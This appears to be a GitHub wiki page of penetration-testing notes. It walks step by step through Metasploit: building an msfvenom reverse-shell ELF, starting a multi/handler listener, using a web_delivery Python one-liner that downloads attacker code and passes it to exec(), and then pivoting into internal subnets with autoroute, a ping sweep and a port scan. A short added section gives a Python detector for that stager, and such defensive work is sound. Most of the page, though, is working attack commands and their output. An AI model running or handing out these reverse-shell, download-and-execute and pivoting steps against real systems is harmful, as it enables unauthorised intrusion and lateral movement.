reverse msfconsole - danielcastropalomares/security GitHub Wiki

Creating a payload with msfvenom:

We create a payload:

root@kali:/tmp# msfvenom -p linux/x86/shell/reverse_tcp -f elf \
>   --platform linux -a x86 -e generic/none LHOST=172.31.255.129 LPORT=5555 \
>  '/tmp/linux-shell-staged-reverse-tcp-5555.elf'
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none succeeded with size 123 (iteration=0)
generic/none chosen with final size 123
Payload size: 123 bytes
Final size of elf file: 207 bytes

We start the Metasploit listener:

msf exploit(multi/handler) > set payload linux/x86/shell/reverse_tcp
payload => linux/x86/shell/reverse_tcp
msf exploit(multi/handler) > 
msf exploit(multi/handler) > set LHOST 172.31.255.129
LHOST => 172.31.255.129
msf exploit(multi/handler) > set LPORT 5555
exploit

We run it on the remote machine and the new session appears:

$ ./linux-shell-staged-reverse-tcp-5555.elf

Kali:

[*] Sending stage (861348 bytes) to 172.31.255.115
[*] Meterpreter session 2 opened (172.31.255.129:5555 -> 172.31.255.115:42798) at 2019-04-08 22:12:57 +0200

We send it to the background:

meterpreter > background
[*] Backgrounding session 2...

We route the traffic through session 2:

msf exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                    Connection
  --  ----  ----                   -----------                                    ----------
  2         meterpreter x64/linux  uid=33, gid=33, euid=33, egid=33 @ 172.18.0.3  172.31.255.129:5555 -> 172.31.255.115:42798 (172.18.0.3)

web_delivery

Attacker machine:

msf > use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > setg lhost 172.31.255.129
msf exploit(multi/script/web_delivery) > setg lport 1111
msf exploit(multi/script/web_delivery) > run
msf exploit(multi/script/web_delivery) > run
[*] Exploit running as background job 0.

[*] Started reverse TCP handler on 172.31.255.129:4444 
[*] Using URL: http://172.31.255.129:1111/ZTPbgL
[*] Server started.
[*] Run the following command on the target machine:
python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://172.31.255.129:1111/ZTPbgL');exec(r.read());"

Victim machine:

python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://172.31.255.129:1111/ZTPbgL');exec(r.read());"

And now on our Kali machine we see the connection appear:

[*] Meterpreter session 1 opened (172.31.255.129:4444 -> 172.31.255.112:38712) at 2019-03-17 23:53:35 +0100
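From the defender's side, the web_delivery one-liner above has a recognisable shape in process-creation logs: an inline `python -c` command that calls urlopen() on a URL and feeds the response straight to exec(). The following is an added example (not part of the original wiki) that flags such command lines; the log lines it scans are constructed samples.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample process-creation log lines (auditd/EDR style), not from the original page.
SAMPLE_LOGS = [
    """pid=4021 user=www-data cmd=python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://172.31.255.129:1111/ZTPbgL');exec(r.read());\"""",
    """pid=4022 user=www-data cmd=python manage.py runserver 0.0.0.0:8000""",
    """pid=4023 user=root cmd=python3 -c "import urllib.request as u;exec(u.urlopen('http://10.0.0.5:8080/abc').read())\"""",
    """pid=4024 user=alice cmd=python -c "print(sum(range(10)))\"""",
]

# Signature pieces of the web_delivery Python target: an inline interpreter
# invocation (python/python2/python3 followed by -c) ...
INLINE_PY = re.compile(r"\bpython[0-9.]*\s+-c\s")
# ... and a literal http(s) URL inside the command.
URL_RE = re.compile(r"https?://[^\s'\"]+")


def detect_web_delivery(cmdline: str) -> Optional[str]:
    """Return the staging URL if cmdline looks like a web_delivery Python
    stager (inline python that urlopen()s a URL and exec()s the body), else None."""
    if not INLINE_PY.search(cmdline):
        return None
    # Both the fetch and the execute primitive must be present in one inline command.
    if "urlopen(" not in cmdline or "exec(" not in cmdline:
        return None
    m = URL_RE.search(cmdline)
    # A stager may also build the URL dynamically; still flag it, but mark the URL unknown.
    return m.group(0) if m else "<url not literal>"


def scan_logs(lines: List[str]) -> List[Tuple[str, str]]:
    """Scan log lines and return (first field, staging URL) for every hit."""
    hits = []
    for line in lines:
        url = detect_web_delivery(line)
        if url:
            hits.append((line.split()[0], url))
    return hits


if __name__ == "__main__":
    for pid, url in scan_logs(SAMPLE_LOGS):
        print(f"{pid}: possible web_delivery stager fetching {url}")
```

A hit is worth correlating with the outbound connection from that process to the staging host and port, which here matches the URL the module printed.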

We can now run Metasploit exploits against the victim machine. So that the Metasploit instance on our Kali box can reach the remote network ranges, we use the autoroute module, which automatically routes that traffic through the open reverse shell:

msf exploit(multi/script/web_delivery) > use post/multi/manage/autoroute
msf post(multi/manage/autoroute) > set session 1
session => 1
msf post(multi/manage/autoroute) > exploit

[!] SESSION may not be compatible with this module.
[*] Running module against vulnvm
[*] Searching for subnets to autoroute.
[*] Unable to get routes from session, trying interface list.
[+] Route added to subnet 172.31.255.0/255.255.255.0 from enp0s3.
[+] Route added to subnet 172.17.0.0/255.255.0.0 from docker0.
[+] Route added to subnet 172.18.0.0/255.255.0.0 from br-c714e887a53b.
[*] Post module execution completed

Now we use the ping_sweep module to discover the remote hosts:

msf post(multi/manage/autoroute) > use post/multi/gather/ping_sweep
msf post(multi/gather/ping_sweep) > set rhosts 172.18.0.0-255
rhosts => 172.18.0.0-255
msf post(multi/gather/ping_sweep) > set session 1
session => 1
msf post(multi/gather/ping_sweep) > exploit

[*] Performing ping sweep for IP range 172.18.0.0-255
[+]     172.18.0.2 host found
[+]     172.18.0.1 host found
[+]     172.18.0.3 host found
[+]     172.18.0.4 host found

And the port scan module:

msf auxiliary(scanner/portscan/tcp) >  use auxiliary/scanner/portscan/tcp
msf auxiliary(scanner/portscan/tcp) > set rhosts 172.18.0.0-4
rhosts => 172.18.0.0-4
msf auxiliary(scanner/portscan/tcp) > set threads 10
threads => 10
msf auxiliary(scanner/portscan/tcp) > exploit

[+] 172.18.0.1:           - 172.18.0.1:22 - TCP OPEN
[+] 172.18.0.2:           - 172.18.0.2:80 - TCP OPEN
[+] 172.18.0.4:           - 172.18.0.4:2021 - TCP OPEN
[+] 172.18.0.3:           - 172.18.0.3:3306 - TCP OPEN
[+] 172.18.0.1:           - 172.18.0.1:8000 - TCP OPEN
[*] Scanned 1 of 5 hosts (20% complete)
[*] Scanned 5 of 5 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/portscan/tcp) >